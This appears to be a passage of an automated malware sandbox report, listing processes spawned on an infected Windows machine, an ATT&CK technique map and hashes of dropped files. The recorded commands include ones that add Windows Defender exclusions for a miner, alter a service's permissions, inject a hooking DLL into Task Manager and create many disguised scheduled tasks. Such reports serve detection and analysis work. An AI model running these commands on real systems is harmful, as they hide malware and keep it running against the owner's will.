C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 996
6⤵
PID:7548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1016
6⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:2588

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:8892

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
PID:9004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:332

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:8548

C:\Users\Admin\AppData\Local\Temp\tuc4.exe
"C:\Users\Admin\AppData\Local\Temp\tuc4.exe"
3⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\is-OQ6P1.tmp\tuc4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OQ6P1.tmp\tuc4.tmp" /SL5="$40364,4603451,54272,C:\Users\Admin\AppData\Local\Temp\tuc4.exe"
4⤵
PID:8500

C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe
"C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
5⤵
PID:888

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 1131
5⤵
PID:8844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 1131
6⤵
PID:3600

C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe
"C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
5⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
2⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
3⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\ARA.exe
"C:\Users\Admin\AppData\Local\Temp\ARA.exe"
4⤵
PID:7356

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
5⤵
PID:5708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
6⤵
PID:8732

C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
7⤵
PID:8592

C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe
"C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe"
8⤵
PID:9088

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe"
2⤵
PID:2176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:888

C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe"
2⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\Files\miner.exe
"C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"
2⤵
PID:6612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
3⤵
PID:6784

C:\Users\Admin\AppData\Local\Temp\Files\build.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
2⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
2⤵
PID:7960

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1484 -ip 1484
1⤵
PID:4336

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1988

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3924 -ip 3924
1⤵
PID:7936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9048 -ip 9048
1⤵
PID:8060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9048 -ip 9048
1⤵
PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 9048 -ip 9048
1⤵
PID:9120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 9048 -ip 9048
1⤵
PID:6520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9048 -ip 9048
1⤵
PID:8376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 9048 -ip 9048
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9048 -ip 9048
1⤵
PID:8580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 9048 -ip 9048
1⤵
PID:7204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9048 -ip 9048
1⤵
PID:8632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:8716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9048 -ip 9048
1⤵
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 9048 -ip 9048
1⤵
PID:7916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 9048 -ip 9048
1⤵
PID:8788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:8820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9048 -ip 9048
1⤵
PID:8892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 9048 -ip 9048
1⤵
PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 9048 -ip 9048
1⤵
PID:7200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9048 -ip 9048
1⤵
PID:8676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
PID:6164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4820 -ip 4820
1⤵
PID:8228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4820 -ip 4820
1⤵
PID:9172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4820 -ip 4820
1⤵
PID:6984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4820 -ip 4820
1⤵
PID:8548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4820 -ip 4820
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4820 -ip 4820
1⤵
PID:5836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5588 -ip 5588
1⤵
PID:7428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5588 -ip 5588
1⤵
PID:7408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:7400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5588 -ip 5588
1⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:6576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5588 -ip 5588
1⤵
PID:6736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5588 -ip 5588
1⤵
PID:6336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5588 -ip 5588
1⤵
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5588 -ip 5588
1⤵
PID:8808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5588 -ip 5588
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5588 -ip 5588
1⤵
PID:8516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5588 -ip 5588
1⤵
PID:8652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5588 -ip 5588
1⤵
PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\odt\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmpt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:8644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\odt\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Music\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Music\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 6 /tr "'C:\odt\hack1226.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\odt\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetupB" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /f
1⤵
PID:7772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetup" /sc ONLOGON /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /rl HIGHEST /f
1⤵
PID:7692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetupB" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /f
1⤵
- Creates scheduled task(s)
PID:7584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:6780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:6708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 8 /tr "'C:\odt\hack1226.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226" /sc ONLOGON /tr "'C:\odt\hack1226.exe'" /rl HIGHEST /f
1⤵
PID:6332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /f
1⤵
- Creates scheduled task(s)
PID:7728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /rl HIGHEST /f
1⤵
PID:9024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmpt" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /f
1⤵
PID:6060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:6592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\odt\msedge.exe'" /rl HIGHEST /f
1⤵
PID:7508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\odt\msedge.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:8252

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:8088

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe
Filesize
1.5MB

MD5
8ebfb00f97e5120227605496dee1ba2d

SHA1
3c225ff088d0fde20c4f2908363909dcc8efdc8c

SHA256
72ac498f8d99dd2b4c4c4f68a2c709c97dd3f397ac02be6ad1b5b874450c146e

SHA512
d9e566c6ca2db028dce7a7ee068bddd86ad2def9a8fe222af4be72e8618f08423b8bd81a9f709bc86c161b63fc9bade35138386d8cc3411a8fe23c5a84ce9328

Download Submit
C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe
Filesize
267KB

MD5
6c470a474bcd0902eaf56d1a9de6dd30

SHA1
b5430adad63965947a287869071127437c9f7082

SHA256
81e6eb7e42e56753eb37f885a16593b91861fba4ee8fec9895b756505f968243

SHA512
654b174e509c32e4aacf5956ff51c16fc423218d93a27fe2a52077d7cecfd1db3d211ea1dec629526b85a2fa8a0a79aca6e24b781763459bdad7897efde274a7

Download Submit
C:\ProgramData\JSON Nested Objects 64\JSON Nested Objects 64.exe
Filesize
819KB

MD5
42d000728b9cc0e41837ae4a2c2e1861

SHA1
56c3f4fc2a9f2aa4f5dd9ac77639b94c9c090cce

SHA256
65e73aa9627827857de06ed1ed58606585402ddb181445e28dcc608dce344d1a

SHA512
a43cd491d000a768a2b238b302a9bcf2814b9c6b8e8961506eecffcc483cf632b50a20d6b8027bfac6691bf5a10b6cc8c9026307e23a44d4fa7e7f0f2591b4aa

Download Submit
C:\ProgramData\JSON Nested Objects 64\JSON Nested Objects 64.exe
Filesize
1.7MB

MD5
0c1a083d4c27ab1ad32b401cefce50a0

SHA1
dc89bada7b113873c2c594e4886945cc19d7ab1d

SHA256
481816a367fb981a94c91ff8e1bead07f70a5f22d3d52fd260f345ff3dbed4f8

SHA512
23262ef79253fda87efe05c6f430675a5d0a9f34b08d00fd92f4a26bb8ff23a4eb809222181ab5e02fb4f7c68302209d700a9c105acda5c9d064ccc6791cad0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
756afb1d5cbdb311a007b19939fb62c3

SHA1
6dff714b1cb43c3be8607b3acdf9865f9c0690e1

SHA256
a925d3b5c1f49e7fab70613cf82643cd1c8bbfb1ee7abd69b0a639ac8c8dd5fe

SHA512
43b7fced9ff5be96ab805252182526855e90e29f1b1d4de865605685196150390f556d8ca2535fbaf2833faa09bc0dd450bf3ccda21668610fadbfd874312d4d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
e9a465cee078cb543fce8b2c05ffc405

SHA1
b7db9e7639fecb0d41a67ffa3d7113561891681f

SHA256
f06beeb6ca49c29fb7dce80399e84623a4a4db2e5a6106b0b71bb67561e9a622

SHA512
0cf67fe93c95caf2c05b31b873e762aa7259fd0ff2c69d5a686ee02d1375d8a5cde3f2db30cead80e44e0d16544065bf721b6c8179a09acd8926747b00276291

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
229KB

MD5
946a938909e612d5ee067350262f77ed

SHA1
c5c98aac23756eb6b57dccf0f9bd07f04095c40d

SHA256
00fe08b948dcfea88933d69220187a392dc88eacf0662f7b2cfd1de7a2a9fb5a

SHA512
80babfd38f3582a984b544bdb62fd7a57ac2006399aceda350a8debbea30f780741c08d1d64ff2ed03b7efb6b2c8af6ccd37c81ed53e3c44e832ad987666bce9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
114KB

MD5
2769d3268cab0856cfa1448fc510a328

SHA1
10dc33be3d2d634a9ad73dc8e134b42307868b7a

SHA256
f9020911de2fe84cdd624038c09346a6e73dd055cdd8bf1fe9845f080570750a

SHA512
eb630e5a2c72bcecae3f8cc89eec879436f4f2dda15504bf5e45871d56ee3854bee3d497756b29ea224296a66dc2c07661292ed9464452b0642eac38c622fdc6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
114KB

MD5
e0d992153f10310cc7d7911b8904b81d

SHA1
2626844e578d2f677e355b23df946e2e8adec440

SHA256
903803d5267bc05bad16f4242e17faa129f504f0b50712cdd5f6d15f0318038d

SHA512
c48628b29615448aa96c196e4c6a5ca68e5a5df48a4aaba8d1934269e67b5ae8de6bc31a547f5cb3a210b5a8e2f7f9195d6356a0de667a5c1e8c1c2660d2e28b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
57KB

MD5
f53015e75e094695378d869e1afcd241

SHA1
2dffec31d5bac31f45122136aaefcd521bb476fd

SHA256
98309eacbf8c74c291d19a28b5e2f65fd6078cb6ba2586e52aafbf5177892456

SHA512
46ab15ed035f95a14adec05a3a768a3852c3e114466dfb51a5f5567f0e57b260976cd6454ab9f2dd47a3578907e2b238361ff1f42d63e9bad556ddaeb2fd4c0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
6b6480dfee785e6087c87a35f43e9288

SHA1
ded962dfbd4c398211e56f2da442f502f2e7f54f

SHA256
26e88e624895d4631bb8d45bd447de2489cdd291c3864d0c7e72efb27503cf61

SHA512
89745c25fe18829105059ba9792e0e2d54377171bf11af5141c2941f5a1a7ef5b7fc57c4bcd207b16f9e50b4ad2b07fa881d87c11a14dd94437f1bd1ed9f5e65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5cabc17286e25c0ade7a7f050b6e92a6

SHA1
c25ab09177ad0da9ee6caf78310236bdc2cba319

SHA256
0e75f9140c154297d8f741aea07b90fc1be1b8deb79c3f204148471800e322b6

SHA512
0cc35eda0168f51e5e719ba0bfb226c9f5293a6056d47190a23377deb98244f42c62b8416696cdd13b2db6228c1c8a2513cdf6dbb1d4b59f0c1c889d1acee6e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
78dd7efdcda21010f2485156b8ad2a83

SHA1
0eba79e3bf21fe02a2b04dbe4d8fdbfd4dffc7d8

SHA256
4bde6aa034e14e6af9dc063553a6efae2cfeb96b3fa27c548be7c6daf6fb1eed

SHA512
1719e2c921fee959e9fd942dcd123280a10b465ef2ccf7fbab9c6ffa4dda52ecebb71eae8af33434175e92df9d716ce804732e70ab4ed900b0e1d96f7958a3b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
